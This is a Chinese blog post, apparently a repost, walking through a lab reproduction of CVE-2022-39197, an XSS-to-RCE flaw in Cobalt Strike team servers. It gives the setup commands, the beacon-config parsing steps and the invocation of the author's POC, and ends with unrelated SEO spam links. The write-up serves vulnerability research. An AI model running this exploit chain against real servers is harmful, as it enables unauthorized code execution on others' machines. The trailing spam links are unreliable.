当前位置: 首页 > news >正文

宝安网站建设 名匠鞍山seo外包

宝安网站建设 名匠,鞍山seo外包,yes风淘宝网站,网站建设交接清单漏洞说明 根据9.20日CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍&#xff0c;<4.7的teamserver版本存在XSS漏洞&#xff0c;从而可以造成RCE远程代码执行 一位名为“Beichendream”的独立研究人员联系我们&#xff0c;告知我们他们在团队服务器中发现的一个 XSS …

漏洞说明

根据9.20日CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍,<=4.7的teamserver版本存在XSS漏洞,从而可以造成RCE远程代码执行

一位名为“Beichendream”的独立研究人员联系我们,告知我们他们在团队服务器中发现的一个 XSS 漏洞。这将允许攻击者在 Beacon 配置中设置格式错误的用户名,从而允许他们远程执行代码RCE。


复现过程

根据漏洞原理,类似之前使用的cs上线器,稍微修改一下上线的payload即可。

测试环境

服务端:Ubuntu20.04+JDK11+CS4.3 (IP: 172.16.12.13)

客户端:M2 macOS Monterey 12.5 + JDK17 (IP: 172.16.12.2)

用到的工具:CobaltStrikeParser、CVE-2022-39197 POC


环境搭建

# ubuntu
chmod +x teamserver
./teamserver 172.16.12.13 haha123
# macOS--提供图片加载服务,如果联网的话可以省略该步,使用任意在线图片的url
brew install node@14
npm i --global serve
serve		# 用serve在图片路径下开启服务, 此处图片文件url为:http://172.16.12.2:3000/logo.png

CS中创建一个listener监听器

image-20220923195818451

然后生成一个package木马,经测试,是否勾选x64(即生成的32位和64位均可上线)不影响结果

image-20220923200124179

POC使用

首先对这个生成的beacon进行分析,我们这里使用CobaltStrikeParser这个工具。

python3 parse_beacon_config.py beacon4.3_x64.exe --json

重点关注如下几个点

PortC2ServerHttpPostUri进行拼接,这里变成:http://172.16.12.13:8080/visit.js/submit.php,记录下来

PublicKey复制到一个txt文件中,注意去除前后的空格

使用我写的POC(编写不易,麻烦加个star吧,后期会把上述分析功能集成,一站式实现)

python3 cve-2022-39197-poc.py -i http://172.16.12.2:3000/logo.png -u http://172.16.12.13:8080/visit.js/submit.php -k key.txt


转载于:https://blog.csdn.net/qq_35664104/article/details/127018606?spm=1001.2100.3001.7377&utm_medium=distribute.pc_feed_blog_category.none-task-blog-classify_tag-15-127018606-null-null.nonecase&depth_1-utm_source=distribute.pc_feed_blog_category.none-task-blog-classify_tag-15-127018606-null-null.nonecase
http://www.shuangfujiaoyu.com/news/53604.html

相关文章:

  • 口碑营销的本质是什么关键词优化简易
  • 潍坊网站建设最新报价seo技术培训沈阳
  • surface go 网站开发买外链有用吗
  • 百度搜索网站提交免费域名解析网站
  • 邢台市的做网站制作公司乐事薯片软文推广
  • 外卖网站建设文档seo教学免费课程霸屏
  • html网站两边的浮窗怎么做网络营销推广工具有哪些?
  • 鄂尔多斯市城乡建设委员会网站搜索优化引擎
  • 教育视频培训网站建设汽车网站建设方案
  • 小白如何搭建个人网站技能培训
  • iis7 添加php网站短视频推广app
  • 毕业设计做网站有哪些需求seo网站建设是什么意思
  • 重庆企业网站建设报价百度seo推广软件
  • 商城网站建设网站开发北京公司
  • dedecms导入网站模板企业培训课程视频
  • 燕郊网站制作商丘网站seo
  • 专业供应的网站制作怎么自己建立网站
  • 眉县网站开发建站
  • 在线客服联系seo搜索推广费用多少
  • 六安市 网站集约化建设国家认可的教育培训机构
  • 现在lol谁做教学视频网站最新nba排名
  • 湘潭做网站价格 d磐石网络为什么打开网址都是站长工具
  • 企业网站备案申请seo快速排名软件品牌
  • 做网站编程要学什么指数基金定投怎么买
  • 自己做b2b平台网站建设seo引擎搜索
  • 网站开发 保修期百度官方入口
  • 设计方案审查意见班级优化大师网页版登录
  • 免费h5源码资源源码站热点时事新闻
  • 泉州科技云网站建设爱站网长尾关键词挖掘工具电脑版
  • 做网站ps文字有锯齿seo百度排名优化